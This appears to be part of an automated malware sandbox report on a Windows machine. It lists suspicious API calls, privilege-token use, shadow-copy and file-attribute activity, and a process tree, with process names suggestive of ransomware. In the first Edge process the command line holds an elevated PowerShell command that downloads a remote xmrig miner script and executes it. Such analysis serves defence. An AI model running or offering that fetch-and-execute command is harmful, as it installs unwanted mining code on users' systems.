pid Process 4504 msedge.exe 4504 msedge.exe 2376 msedge.exe 2376 msedge.exe 3596 identity_helper.exe 3596 identity_helper.exe 5972 msedge.exe 5972 msedge.exe 408 msedge.exe 408 msedge.exe 3624 identity_helper.exe 3624 identity_helper.exe 2668 mspaint.exe 2668 mspaint.exe 5140 msedge.exe 5140 msedge.exe 4932 msedge.exe 4932 msedge.exe 5616 identity_helper.exe 5616 identity_helper.exe 4416 msedge.exe 4416 msedge.exe 4264 msedge.exe 4264 msedge.exe 1464 msedge.exe 1464 msedge.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe 7140 taskhsvc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 38 IoCs
pid Process 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2656 explorer.exe Token: SeCreatePagefilePrivilege 2656 explorer.exe Token: SeIncreaseQuotaPrivilege 4876 WMIC.exe Token: SeSecurityPrivilege 4876 WMIC.exe Token: SeTakeOwnershipPrivilege 4876 WMIC.exe Token: SeLoadDriverPrivilege 4876 WMIC.exe Token: SeSystemProfilePrivilege 4876 WMIC.exe Token: SeSystemtimePrivilege 4876 WMIC.exe Token: SeProfSingleProcessPrivilege 4876 WMIC.exe Token: SeIncBasePriorityPrivilege 4876 WMIC.exe Token: SeCreatePagefilePrivilege 4876 WMIC.exe Token: SeBackupPrivilege 4876 WMIC.exe Token: SeRestorePrivilege 4876 WMIC.exe Token: SeShutdownPrivilege 4876 WMIC.exe Token: SeDebugPrivilege 4876 WMIC.exe Token: SeSystemEnvironmentPrivilege 4876 WMIC.exe Token: SeRemoteShutdownPrivilege 4876 WMIC.exe Token: SeUndockPrivilege 4876 WMIC.exe Token: SeManageVolumePrivilege 4876 WMIC.exe Token: 33 4876 WMIC.exe Token: 34 4876 WMIC.exe Token: 35 4876 WMIC.exe Token: 36 4876 WMIC.exe Token: SeIncreaseQuotaPrivilege 4876 WMIC.exe Token: SeSecurityPrivilege 4876 WMIC.exe Token: SeTakeOwnershipPrivilege 4876 WMIC.exe Token: SeLoadDriverPrivilege 4876 WMIC.exe Token: SeSystemProfilePrivilege 4876 WMIC.exe Token: SeSystemtimePrivilege 4876 WMIC.exe Token: SeProfSingleProcessPrivilege 4876 WMIC.exe Token: SeIncBasePriorityPrivilege 4876 WMIC.exe Token: SeCreatePagefilePrivilege 4876 WMIC.exe Token: SeBackupPrivilege 4876 WMIC.exe Token: SeRestorePrivilege 4876 WMIC.exe Token: SeShutdownPrivilege 4876 WMIC.exe Token: SeDebugPrivilege 4876 WMIC.exe Token: SeSystemEnvironmentPrivilege 4876 WMIC.exe Token: SeRemoteShutdownPrivilege 4876 WMIC.exe Token: SeUndockPrivilege 4876 WMIC.exe Token: SeManageVolumePrivilege 4876 WMIC.exe Token: 33 4876 WMIC.exe Token: 34 4876 WMIC.exe Token: 35 4876 WMIC.exe Token: 36 4876 WMIC.exe Token: SeBackupPrivilege 5732 vssvc.exe Token: SeRestorePrivilege 5732 vssvc.exe Token: SeAuditPrivilege 5732 vssvc.exe Token: SeTcbPrivilege 6888 taskse.exe Token: SeTcbPrivilege 6888 taskse.exe Token: SeDebugPrivilege 4880 SearchApp.exe Token: SeDebugPrivilege 4880 SearchApp.exe Token: SeDebugPrivilege 4880 SearchApp.exe Token: SeManageVolumePrivilege 7900 svchost.exe Token: SeDebugPrivilege 7580 SearchApp.exe Token: SeDebugPrivilege 7580 SearchApp.exe Token: SeDebugPrivilege 7580 SearchApp.exe Token: SeDebugPrivilege 7580 SearchApp.exe Token: SeDebugPrivilege 7580 SearchApp.exe Token: SeTcbPrivilege 7292 taskse.exe Token: SeTcbPrivilege 7292 taskse.exe Token: SeTcbPrivilege 5884 taskse.exe Token: SeTcbPrivilege 5884 taskse.exe Token: SeTcbPrivilege 6336 taskse.exe Token: SeTcbPrivilege 6336 taskse.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 2656 explorer.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 2376 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 408 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe 4932 msedge.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
pid Process 2668 mspaint.exe 5588 OpenWith.exe 6124 @[email protected] 6124 @[email protected] 6824 @[email protected] 6824 @[email protected] 5920 @[email protected] 5920 @[email protected] 4880 SearchApp.exe 7580 SearchApp.exe 7552 @[email protected] 8040 @[email protected] 2080 @[email protected] 4148 @[email protected] 6440 @[email protected] 3480 @[email protected] 8008 @[email protected] 5884 @[email protected] 6224 LogonUI.exe 6224 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2376 wrote to memory of 5068 2376 msedge.exe 82 PID 2376 wrote to memory of 5068 2376 msedge.exe 82 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4724 2376 msedge.exe 83 PID 2376 wrote to memory of 4504 2376 msedge.exe 84 PID 2376 wrote to memory of 4504 2376 msedge.exe 84 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 PID 2376 wrote to memory of 1800 2376 msedge.exe 85 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 7 IoCs
pid Process 7420 attrib.exe 6548 attrib.exe 7576 attrib.exe 6084 attrib.exe 1684 attrib.exe 7400 attrib.exe 7256 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff6e146f8,0x7ffff6e14708,0x7ffff6e147182⤵PID:5068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:22⤵PID:4724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:82⤵PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:12⤵PID:2932
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:12⤵PID:2924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:12⤵PID:1848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:82⤵PID:2492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:12⤵PID:4944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:12⤵PID:3244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:12⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:12⤵PID:2700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,15680231178713783599,1309631935070030945,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2992 /prefetch:12⤵PID:5512
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4196
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵PID:6020
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:408 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffff6e146f8,0x7ffff6e14708,0x7ffff6e147182⤵PID:984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1928 /prefetch:22⤵PID:3108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:5972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2748 /prefetch:82⤵PID:4980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵PID:6132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:12⤵PID:6136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:12⤵PID:5632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1.5 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:12⤵PID:5620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:82⤵PID:3664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1884,1954983704767957091,3544383685108262241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3624
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1652
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5428
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:6140
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2656 -
C:\Windows\system32\systempropertiesadvanced.exe"C:\Windows\system32\systempropertiesadvanced.exe"2⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
PID:5768
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2780
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Windows\Web\Wallpaper\Theme2\img9.jpg" /ForceBootstrapPaint3D1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2668
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc1⤵PID:5264
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:5588
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4932 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff6e146f8,0x7ffff6e14708,0x7ffff6e147182⤵PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:22⤵PID:4328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,81109565388450465,10667924567249947795,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:5140
-
-
